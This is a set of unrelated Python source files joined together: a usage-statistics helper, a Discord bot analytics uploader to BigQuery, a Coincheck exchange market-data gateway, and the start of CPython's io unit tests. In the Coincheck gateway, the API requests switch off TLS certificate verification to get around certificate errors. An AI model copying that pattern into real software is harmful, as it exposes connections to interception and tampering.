anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
if data_context._usage_statistics_handler:
# noinspection PyBroadException
try:
batch_request_anonymizer: BatchRequestAnonymizer = (
data_context._usage_statistics_handler._batch_request_anonymizer
)
payload = batch_request_anonymizer.anonymize_batch_request(*args, **kwargs)
except Exception:
logger.debug(
"get_batch_list_usage_statistics: Unable to create anonymized_batch_request payload field"
)
return payload
# noinspection PyUnusedLocal
def get_checkpoint_run_usage_statistics(checkpoint, *args, **kwargs):
try:
data_context_id = checkpoint.data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
if checkpoint._usage_statistics_handler:
# noinspection PyBroadException
try:
checkpoint_run_anonymizer: CheckpointRunAnonymizer = (
checkpoint._usage_statistics_handler._checkpoint_run_anonymizer
)
checkpoint_config: CheckpointConfig = copy.deepcopy(checkpoint.config)
substituted_runtime_config: CheckpointConfig = (
checkpoint_run_anonymizer.resolve_config_using_acceptable_arguments(
*(checkpoint,), **kwargs
)
)
resolved_runtime_kwargs: dict = substituted_runtime_config.to_json_dict()
payload = checkpoint_run_anonymizer.anonymize_checkpoint_run(
*(checkpoint,), **resolved_runtime_kwargs
)
checkpoint._config = checkpoint_config
except Exception:
logger.debug(
"get_batch_list_usage_statistics: Unable to create anonymized_checkpoint_run payload field"
)
return payload
def send_usage_message(
data_context,
event: str,
event_payload: Optional[dict] = None,
success: Optional[bool] = None,
):
"""send a usage statistics message."""
# noinspection PyBroadException
try:
handler: UsageStatisticsHandler = getattr(
data_context, "_usage_statistics_handler", None
)
message: dict = {
"event": event,
"event_payload": event_payload,
"success": success,
}
if handler is not None:
handler.emit(message)
except Exception:
pass
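# Usage sketch (hypothetical event name, not part of this module):
# send_usage_message(context, event="cli.suite.edit", event_payload={}, success=True)
# The call is a silent no-op when the context has no _usage_statistics_handler.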
|
analytics.py
|
import logging
import io
import json
import datetime
import threading
import time
from typing import Union
from google.cloud import bigquery
import discord
from discord.ext import commands
from discord_slash import SlashContext
# Set up logging
logger = logging.getLogger(__name__)
def run_on_another_thread(function):
"""
This decorator will run the decorated function in another thread, starting it immediately.
:param function:
:return:
"""
def f(*args, **kargs):
threading.Thread(target=function, args=args, kwargs=kargs).start() # forward positional and keyword arguments unchanged
return f
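# Illustrative usage (hypothetical function, not part of this module):
#
# @run_on_another_thread
# def slow_upload(payload):
#     ...  # body runs on a freshly started thread; the caller returns immediately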
def _is_blacklisted(context: commands.Context):
# Ignore dev server
if isinstance(context.channel, discord.TextChannel) and context.channel.guild.id in [454852632528420876, 799455809297842177]:
logger.info(f'Ignoring analytics submission for development server.')
return True
return False
def get_guild_and_channel_id(context: commands.Context):
if isinstance(context.channel, discord.TextChannel):
return context.channel.guild.id, context.channel.id
elif isinstance(context.channel, discord.DMChannel):
return None, context.channel.id
def to_bq_file(items):
return io.StringIO('\n'.join([json.dumps(x) for x in items]))
def upload(config):
client = bigquery.Client()
logger.info(f'Uploading {len(config["queue"])} items to {config["table"]}')
data_as_file = to_bq_file(config['queue'])
job = client.load_table_from_file(data_as_file, config['table'], job_config=config['job_config'])
try:
job.result() # Waits for the job to complete.
config['queue'].clear()
except Exception as e:
logger.exception(f'Failed BigQuery upload job! Errors: {job.errors}', exc_info=e)
def create_qal_item(table, job_config):
return {
'queue': [],
'lock': threading.Lock(),
'table': table,
'job_config': job_config
}
# Queues and locks
qal = {
'log_command': create_qal_item(
'formal-scout-290305.analytics.commands',
bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("command_name", "STRING", mode="REQUIRED"),
bigquery.SchemaField("is_slash", "BOOLEAN", mode="REQUIRED"),
bigquery.SchemaField("guild_id", "INTEGER"),
bigquery.SchemaField("channel_id", "INTEGER"),
bigquery.SchemaField("time", "TIMESTAMP"),
],
source_format=bigquery.SourceFormat.NEWLINE_DELIMITED_JSON,
autodetect=True
)
),
'log_definition_request': create_qal_item(
'formal-scout-290305.analytics.definition_requests',
bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("word", "STRING", mode="REQUIRED"),
bigquery.SchemaField("reverse", "BOOLEAN", mode="REQUIRED"),
bigquery.SchemaField("text_to_speech", "BOOLEAN", mode="REQUIRED"),
bigquery.SchemaField("language", "STRING", mode="REQUIRED"),
bigquery.SchemaField("guild_id", "INTEGER"),
bigquery.SchemaField("channel_id", "INTEGER"),
bigquery.SchemaField("time", "TIMESTAMP"),
],
source_format=bigquery.SourceFormat.NEWLINE_DELIMITED_JSON,
autodetect=True
)
),
'log_dictionary_api_request': create_qal_item(
'formal-scout-290305.analytics.dictionary_api_requests',
bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("api_name", "STRING", mode="REQUIRED"),
bigquery.SchemaField("success", "BOOLEAN", mode="REQUIRED"),
bigquery.SchemaField("time", "TIMESTAMP", mode="REQUIRED")
],
source_format=bigquery.SourceFormat.NEWLINE_DELIMITED_JSON,
autodetect=True
)
)
}
def analytics_uploader_thread():
while True:
time.sleep(60 * 5)
for key, value in qal.items():
try:
queue = value['queue']
lock = value['lock']
with lock:
if len(queue) > 0:
upload(value)
except Exception as e:
logger.exception('Error uploading analytics!', exc_info=e)
threading.Thread(target=analytics_uploader_thread).start()
@run_on_another_thread
def log_command(command_name: str, is_slash: bool, context: Union[commands.Context, SlashContext]):
queue = qal['log_command']['queue']
with qal['log_command']['lock']:
if _is_blacklisted(context):
return
guild_id, channel_id = get_guild_and_channel_id(context)
data = {
'command_name': command_name,
'is_slash': is_slash,
'guild_id': guild_id,
'channel_id': channel_id,
'time': datetime.datetime.now().isoformat()
}
queue.append(data)
@run_on_another_thread
def log_definition_request(word: str, reverse: bool, text_to_speech: bool, language: str, context: commands.Context):
queue = qal['log_definition_request']['queue']
with qal['log_definition_request']['lock']:
if _is_blacklisted(context):
return
guild_id, channel_id = get_guild_and_channel_id(context)
data = {
'word': word,
'reverse': reverse,
'text_to_speech': text_to_speech,
'language': language,
'guild_id': guild_id,
'channel_id': channel_id,
'time': datetime.datetime.now().isoformat()
}
queue.append(data)
@run_on_another_thread
def log_dictionary_api_request(dictionary_api_name: str, success: bool):
queue = qal['log_dictionary_api_request']['queue']
with qal['log_dictionary_api_request']['lock']:
data = {
'api_name': dictionary_api_name,
'success': success,
'time': datetime.datetime.now().isoformat()
}
queue.append(data)
|
coincheck.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
import threading
import time
class ExchGwApiCoincheck(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_timestamp_offset(cls):
return 1000
@classmethod
def get_order_book_timestamp_field_name(cls):
return 'date'
@classmethod
def get_trades_timestamp_field_name(cls):
return 'created_at'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'order_type'
@classmethod
def get_trade_id_field_name(cls):
return 'id'
@classmethod
def get_trade_price_field_name(cls):
return 'rate'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://coincheck.com/api/order_books"
@classmethod
def get_trades_link(cls, instmt):
return "https://coincheck.com/api/trades?pair=%s" % instmt.get_instmt_code()
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# No date/time information in the response; stamp with the current UTC time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if type(bids[i][0]) != float else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if type(bids[i][1]) != float else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if type(asks[i][0]) != float else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if type(asks[i][1]) != float else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
#date_time = float(raw[cls.get_trades_timestamp_field_name()])
#date_time = date_time / cls.get_timestamp_offset()
date_time = raw[cls.get_trades_timestamp_field_name()]
trade.date_time = datetime.strptime(date_time, '%Y-%m-%dT%H:%M:%S.%fZ').strftime('%Y%m%d %H:%M:%S.%f')
# Trade side
trade.trade_side = Trade.parse_side(raw[cls.get_trade_side_field_name()])
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
# If verify cert, got <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:749)>
res = cls.request(cls.get_order_book_link(instmt), verify_cert=False)
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:return: List of trades
"""
link = cls.get_trades_link(instmt)
# If verify cert, got <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:749)>
res = cls.request(link, verify_cert=False)
trades = []
if len(res['data']) > 0:
for t in res['data']:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
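# Usage sketch (requires network access; Instrument is constructed as in __main__ below):
# instmt = Instrument('Coincheck', 'btc_jpy', 'btc_jpy')
# depth = ExchGwApiCoincheck.get_order_book(instmt)  # L2Depth snapshot or None
# trades = ExchGwApiCoincheck.get_trades(instmt)     # list of Trade objects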
class ExchGwCoincheck(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiCoincheck(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Coincheck'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
time.sleep(1)
continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Coincheck'
instmt_name = 'btc_jpy'
instmt_code = 'btc_jpy'
exch = ExchGwApiCoincheck()
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwCoincheck([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
exch.start(instmt)
#exch.get_order_book_worker(instmt)
#exch.get_trades_worker(instmt)
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import import_helper
from test.support import os_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support import skip_if_sanitizer
from test.support.os_helper import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
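# Illustrative note (not in the original file): byteslike(b"abc") yields an
# object that supports the buffer protocol -- bytes(byteslike(b"abc")) == b"abc"
# and it can be handed to readinto() -- while exposing none of the str/bytes
# sequence methods, which is exactly what the readinto tests below rely on.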
# Does the io.IOBase finalizer log the exception if the close() method fails?
# The exception is silently ignored by default in a release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
requires_alarm = unittest.skipUnless(
hasattr(signal, "alarm"), "test requires signal.alarm()"
)
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong, but we have to return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
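# --- illustrative sketch (not part of the original test suite) ---------------
# Because the mocks above omit read(), callers fall back to the default
# RawIOBase.read(), which allocates a buffer and delegates to readinto().
# A minimal, hypothetical demonstration of that fallback, using only the
# `io` module imported above:
class _ReadintoOnly(io.RawIOBase):
    """Raw stream that implements readinto() only; read() is inherited."""
    def readable(self):
        return True

    def readinto(self, buf):
        data = b"xyz"[:len(buf)]
        buf[:len(data)] = data
        return len(data)

assert _ReadintoOnly().read(2) == b"xy"  # inherited read() used readinto()
# ------------------------------------------------------------------------------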
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
os_helper.unlink(os_helper.TESTFN)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w', encoding="utf-8")
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w', encoding="utf-8")
def test_raw_file_io(self):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(os_helper.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and macOS this test consumes large resources; it takes a long
# time to build the >2 GiB file and needs >2 GiB of disk space, so the
# 'largefile' resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(os_helper.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(os_helper.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
